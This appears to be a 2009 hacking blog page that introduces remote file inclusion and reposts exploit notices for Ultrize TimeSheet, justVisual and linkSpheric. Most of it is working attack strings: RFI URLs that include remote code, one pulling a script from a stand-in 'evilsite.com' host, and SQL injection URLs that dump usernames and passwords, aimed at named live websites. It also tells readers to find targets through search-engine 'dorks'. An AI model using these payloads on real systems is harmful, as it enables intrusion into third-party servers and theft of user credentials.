Friday, July 31, 2009

RFI

Thank you to my friends who have visited my blog. I will explain RFI. RFI is one way of penetrating a server through port 80. Without further ado, let's go straight to practice. Example:
- Dork <==== a way of finding a target (meaning the keyword that we type into a search engine such as Google)
- Vulnerable file <==== a file where there is...

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

Software : Ultrize TimeSheet version 1.2.2
Vendor : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author : NoGe

[o] Vulnerable file
include($config['include_dir'].'timesheet.class.php');
include/timesheet.php

[o] Exploit
http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]
...

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion
- Vulnerable code is everywhere
- PoC's
http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt
...

linkSpheric 0.74 Beta 6 SQL Injection Vuln

Thursday, July 31, 2009

[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Reference: NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o]...
